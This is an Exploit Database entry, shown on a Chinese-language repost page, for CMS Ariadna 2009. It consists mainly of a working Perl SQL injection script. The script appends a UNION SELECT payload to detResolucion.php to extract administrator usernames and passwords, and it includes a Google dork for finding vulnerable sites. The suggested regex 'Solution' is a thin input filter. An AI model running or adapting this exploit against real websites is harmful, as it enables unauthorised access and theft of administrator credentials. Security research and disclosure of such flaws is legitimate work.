CMS Ariadna 2009 – SQL Injection

• Exploit Database
• 18 阅读

• 作者： Andrés Gómez
  日期： 2010-04-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12301/

• # Exploit Title : CMS Ariadna 2009 SQL Injection
  # Date : 2010-04-19
  # Author : Andrés Gómez
  # Contact : gomezandres@adinet.com.uy
  # Dork : "allinurl: detResolucion.php?tipodoc_id="
  ########################################################################
  Exploit in Perl Start In Next Line:
  
  use LWP::Simple;
  
  ########################################################################
  # Malicious users may inject SQL querys into a vulnerable
  # application to fool a user in order to gather data from them or see
  sensible information.
  ########################################################################
  # Solution:
  # $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
  # $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
  ########################################################################
  # Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi
  ##########################[Andrés Gómez]#################################
  
  my $target = $ARGV[0];
  unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &
  Security-Pentest -- Andres Gomez\n\n";
  print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
  print "\nEjemplo Ejecucion = AriadnaCms.pl
  http://www.sitio.extension/path/\n" ; exit 1; }
  
  $sql =
  "detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
  
  $final = $target.$sql;
  $contenido = get($final);
  
  print "\n\n[+] Pagina Web: $target\n\n";
  if ($contenido =~/security(.*):pentest(.*)/) {
  print "[-] Datos extraidos con exito:\n\n";
  print "[+] Usuario = $1\n";
  print "[+] Password = $2\n";
  } else {
  print "[-] No se obtuvieron datos\n\n";
  exit 1;
  }
  
  print "\n[ñ] Escriba exit para salir de la aplicacion\n";
  
  exit 1;